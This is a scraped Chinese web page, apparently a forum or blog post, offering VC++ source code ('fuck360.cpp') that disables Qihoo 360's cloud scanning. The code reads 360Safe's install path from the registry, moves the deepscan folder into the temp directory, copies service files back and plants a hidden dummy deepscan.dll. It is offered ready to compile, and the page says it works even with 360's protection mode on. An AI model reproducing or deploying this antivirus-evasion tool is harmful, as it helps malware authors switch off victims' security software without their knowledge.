过360云查杀vc++代码_职场把下面的代码保存为一个cpp文件,用vc6.0编译即可    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场用了一个API函数 MoveFile ,把360云查杀的文件夹移动到temp目录,这样就让云查杀失效了,对开了保险箱的也是有效的    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场// ****************************************** fuck360.cpp ***********************************************    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场// By:洪流    
过360云查杀vc++代码_职场#pragma comment(linker, "/OPT:NOWIN98")    
过360云查杀vc++代码_职场#pragma comment(linker, "/merge:.data=.text")    
过360云查杀vc++代码_职场#pragma comment(linker, "/merge:.rdata=.text")    
过360云查杀vc++代码_职场#pragma comment(linker, "/align:0x200")    
过360云查杀vc++代码_职场#pragma comment(linker, "/subsystem:windows")    
过360云查杀vc++代码_职场#include <windows.h>    
过360云查杀vc++代码_职场#include <stdio.h>    
过360云查杀vc++代码_职场#pragma comment(lib,"MSVCRT.lib")    
过360云查杀vc++代码_职场#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场void Torrent()    
过360云查杀vc++代码_职场{    
过360云查杀vc++代码_职场HKEY hKey = NULL;    
过360云查杀vc++代码_职场DWORD len=MAX_PATH;    
过360云查杀vc++代码_职场DWORD type=REG_SZ;    
过360云查杀vc++代码_职场char pBuf[200];    
过360云查杀vc++代码_职场RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360Safe.exe",0,KEY_ALL_ACCESS,&hKey);    
过360云查杀vc++代码_职场if (RegQueryValueEx(hKey, "Path" , NULL, &type, (unsigned char*)pBuf, &len) == ERROR_SUCCESS)    
过360云查杀vc++代码_职场{    
过360云查杀vc++代码_职场char TempPath[200];    
过360云查杀vc++代码_职场char exe[200];    
过360云查杀vc++代码_职场char dll[200];    
过360云查杀vc++代码_职场char exe_1[200];    
过360云查杀vc++代码_职场char dll_1[200];    
过360云查杀vc++代码_职场GetTempPath(sizeof(TempPath),TempPath);    
过360云查杀vc++代码_职场wsprintf(TempPath,"%s\\tmp",TempPath);    
过360云查杀vc++代码_职场wsprintf(pBuf,"%s\\deepscan",pBuf);    
过360云查杀vc++代码_职场MoveFile(pBuf,TempPath);    
过360云查杀vc++代码_职场CreateDirectory(pBuf,NULL);    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场wsprintf(exe,"%s\\360deepscan.exe",TempPath);    
过360云查杀vc++代码_职场wsprintf(dll,"%s\\360wservice.dll",TempPath);    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场wsprintf(exe_1,"%s\\360deepscan.exe",pBuf);    
过360云查杀vc++代码_职场wsprintf(dll_1,"%s\\360wservice.dll",pBuf);    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场CopyFile(exe,exe_1,FALSE);    
过360云查杀vc++代码_职场CopyFile(dll,dll_1,FALSE);    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场FILE *file;    
过360云查杀vc++代码_职场strcat(pBuf,"\\deepscan.dll");    
过360云查杀vc++代码_职场file=fopen(pBuf,"w");    
过360云查杀vc++代码_职场char fuck[10];    
过360云查杀vc++代码_职场wsprintf(fuck,"deepscan");    
过360云查杀vc++代码_职场fputs(fuck,file);    
过360云查杀vc++代码_职场fclose(file);    
过360云查杀vc++代码_职场SetFileAttributes(pBuf, FILE_ATTRIBUTE_HIDDEN);    
过360云查杀vc++代码_职场}    
过360云查杀vc++代码_职场RegCloseKey(hKey);    
过360云查杀vc++代码_职场}    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场//    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场    
过360云查杀vc++代码_职场
过360云查杀vc++代码_职场